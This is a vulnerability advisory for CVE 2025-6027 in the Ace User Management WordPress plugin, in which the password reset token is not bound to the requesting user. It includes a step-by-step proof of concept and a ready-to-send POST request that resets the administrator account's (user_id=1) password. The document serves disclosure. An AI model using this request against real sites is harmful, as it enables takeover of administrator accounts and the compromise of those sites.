Ace User Management <= 2.0.3 – Subscriber+ Authentication Bypass via Password Rest | CVE 2025-6027

Description

The plugin does not properly validate that a password reset token is associated with the user who requested it, allowing any authenticated users, such as subscriber to reset the password of arbitrary accounts, including administrators.

Proof of Concept

## Step 1: Register an Account and Obtain a Valid "randNum" Token

1. If the attacker does not have an account, they must first visit the registration page: https://example.com/registration

2. Register a new account using an email address the attacker controls (e.g., attacker@example.com).

3. Go to the Forgot Password page: https://example.com/loginx/?forget-password

4. Enter the registered email. The plugin sends a reset link like: https://example.com/confirm-password/?randNum=11235

The "randNum=11235" token is valid and will be used in the next step.

---

## Step 2: Send a Crafted Request to Reset Another User's Password

Using Burp Suite Repeater or any HTTP client, send the following POST request:

POST /confirm-password/?randNum=11235 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

password=test1234&confirm_password=test1234&user_id=1&submit_password=Submit

This request resets the password for the user with "user_id=1" to "test1234".

---

## Step 3: Log In to the System

If the attacker knows or brute-forces the username for "user_id=1" (e.g., "admin"), they can log in using:

- Username: admin
- Password: test1234